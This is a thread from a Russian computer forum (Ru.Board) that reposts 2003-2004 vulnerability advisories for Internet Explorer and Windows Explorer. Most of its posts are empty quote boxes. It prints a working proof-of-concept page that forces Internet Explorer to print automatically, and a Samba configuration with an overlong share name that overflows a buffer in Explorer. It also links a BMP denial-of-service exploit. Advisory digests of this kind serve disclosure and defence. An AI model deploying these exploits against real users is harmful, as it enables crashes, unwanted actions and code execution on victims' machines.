Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Операционные системы » Другие ОС » Bugtraq по операционным системам

Модерирует : lynx, dg

 Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6

Открыть новую тему     Написать ответ в эту тему

lynx



Advanced lynx
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Bugtraq по операционным системам

 
 
В теме разрешено постить только информацию о найденных уязвимостях в той или иной ОС, а также об их исправлениях.  

Запрещено жаловаться, что кто-то на этой уязвимости погорел.
Запрещены комментарии.
Запрещено все, кроме постинга голой информации по уязвимостям и не менее голой по их исправлениям.

 
 
Обратите внимание, вопросы безопасности  в системном администрировании постятся в теме BugTraq для сисадминов: уязвимости/исправления форума "В помощь системному администратору".
Вопросы по вирусам постятся в теме Вирусный bugtraq на ru-board форума "Андеграунд".
Общие вопросы сетевой безопасности постятся в теме Новости сетевой безопасности форума "Андеграунд"
 
 
 
Все об уязвимости в RPC DCOM
 

Всего записей: 11712 | Зарегистр. 08-05-2001 | Отправлено: 18:14 13-10-2003 | Исправлено: lynx, 22:51 14-10-2003
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления



 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 14:26 26-03-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления









 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:58 30-03-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления



 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:27 31-03-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления









 

 
Добавлено

Цитата:
Уведомления















 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:45 05-04-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления



 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 13:31 06-04-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления







 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 12:32 08-04-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления



 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:08 12-04-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления














 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 12:58 13-04-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления



 

 
Добавлено

Цитата:
Уязвимости


 


----------
away.

Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:47 14-04-2004
Svarga

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Уведомления






 

 

Цитата:
Уязвимости

  • Автоматическая распечатка Web страницы в Microsoft Internet Explorer
    Программа: Microsoft Internet Explorer 6.0  
    Опасность: Низкая  
    Наличие эксплоита: Да  
    Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может сконструировать HTMl, который, когда будет загружен целевым пользователем, автоматически пошлет задание на принтер целевого пользователя.  
    Пример/Эксплоит:  

    Код:
    <HTML>
    <HEAD>
    <SCRIPT language="JavaScript">
    function ieExecWB( intOLEcmd, intOLEparam )
    {        // Create OLE Object
              var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0  
    CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';
              // Place Object on page
              document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
              // if intOLEparam is not defined, set it
              if ( ( ! intOLEparam ) || ( intOLEparam < -1 )  || (  
    intOLEparam > 1) )
               intOLEparam = 1;
              // Execute Object
              WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
              // Destroy Object
              WebBrowser1.outerHTML = "";
    function printAll()
    {
    // Uncomment this to enable the exploit!
    //ieExecWB(6,-1);
    </SCRIPT>
    </HEAD>
    <BODY onload="printAll()">
    <h3>I like your PRINTER</h3>
    </BODY>
    </HTML>

    URL производителя: http://www.microsoft.com/technet/security/

     
  • Удаленный отказ в обслуживании при обработке bmp изображений в Microsoft Internet Explorer
    Программа: Microsoft Internet Explorer 5.5-6.0  
    Опасность: Низкая  
    Наличие эксплоита: Да  
    Описание: Отказ в обслуживании обнаружен в Microsoft Internet Explorer. Удаленный пользователь может заставить целевой браузер использовать всю доступную системную память.  
    Удаленный пользователь может создать специально сформированный битмап файл, который, когда будет загружен целевым пользователем, заставит браузер выделить чрезмерно большое количество памяти, основываясь на размере файла, представленного пользователем.  
    Пример/Эксплоит: http://www.4rman.com/exploits/tinybmp.htm  
    URL производителя: http://www.Microsoft.com  
    Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

    P. S. последнее работает и в Опере
     

  •  
    Добавлено
    Код эксплоита^ для автораспечатки страниц с ошибками, вот он с исправлением оных:

    Код:
    <HTML>
    <HEAD>
    <SCRIPT language="JavaScript">
    function ieExecWB( intOLEcmd, intOLEparam )
    {        // Create OLE Object
              var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0 CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';
              // Place Object on page
              document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
              // if intOLEparam is not defined, set it
              if ( ( ! intOLEparam ) || ( intOLEparam < -1 )  || (
    intOLEparam > 1) )
               intOLEparam = 1;
              // Execute Object
              WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
              // Destroy Object
              WebBrowser1.outerHTML = "";
    }
    function printAll()
    {
    // Uncomment this to enable the exploit!  
    //ieExecWB(6,-1);  
    }
    </SCRIPT>
    </HEAD>
    <BODY onload="printAll()">
    <h3>I like your PRINTER</h3>
    </BODY>
    </HTML>


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:50 15-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления




     


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 12:12 16-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления





     

     
    Добавлено

    Цитата:
    Уведомления














     


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:09 19-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления




     


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 13:13 20-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления



     


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:29 21-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления





     


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 11:05 22-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления





     


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 15:37 23-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления


















     

     
    Добавлено

    Цитата:
    Переполнение буфера в Microsoft Internet Explorer и Microsoft Windows Explorer в обработке имен сетевых ресурсов

    Программа: Microsoft Internet Explorer, Microsoft Windows Explorer  
    Опасность: Критическая  
    Наличие эксплоита: Да  
    Описание: Уязвимость обнаружена в Microsoft Windows Explorer и в Microsoft Internet Explorer. Удаленный пользователь, контролирующий общедоступный сетевой ресурс (network share), может аварийно завершить работу или выполнить произвольный код на системе целевого пользователя, подключившегося к сетевому ресурсу.  
     
    Удаленный пользователь, контролирующий SMB шару, может установить специально обработанное значение имени шары, чтобы, когда целевой пользователь попытается подключиться к SMB шаре, аварийно завершить работу Microsoft Windows Explorer или Microsoft Internet Explorer или выполнить произвольный код. <> Согласно сообщению, Microsoft устранил эту уязвимость в Windows XP SP1 и Windows 2000 SP4 в начале 2002 года, как описано в Microsoft KB article 322857:  
     
    http://support.microsoft.com/default.aspx?scid=kb;en-us;322857  
     
    Однако уязвимость до сих пор не устранена.  
     
    Пример/Эксплоит: Windows не позволяет создавать длинные шары, однако ее можно создать через samba. Пример smb.conf:  
     
    #------------ CUT HERE -------------
    [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
    comment =3D Area 51
    path =3D /tmp/testfolder
    public =3D yes
    writable =3D yes
    printable =3D no
    browseable =3D yes
    write list =3D @trymywingchung
    #------------ CUT HERE -------------
     
    URL производителя: http://www.microsoft.com/technet/security/  
    Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.  


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 13:11 27-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления



     


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 14:10 30-04-2004
    Svarga

    Moderator
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления





     

     
    Добавлено

    Цитата:
    Уведомления






     

     
    Добавлено

    Цитата:
    Уведомления




     


    ----------
    away.

    Всего записей: 4161 | Зарегистр. 25-06-2002 | Отправлено: 10:45 12-05-2004
    Demetrio

    uid=0
    Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

    Цитата:
    Уведомления



     

     
    Добавлено

    Цитата:
    Уведомления





     
     

    Всего записей: 9967 | Зарегистр. 29-05-2002 | Отправлено: 17:58 20-05-2004 | Исправлено: Demetrio, 18:04 20-05-2004
    Открыть новую тему     Написать ответ в эту тему

    Страницы: 1 2 3 4 5 6

    Компьютерный форум Ru.Board » Операционные системы » Другие ОС » Bugtraq по операционным системам


    Реклама на форуме Ru.Board.

    Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
    Modified by Ru.B0ard
    © Ru.B0ard 2000-2024

    BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

    Рейтинг.ru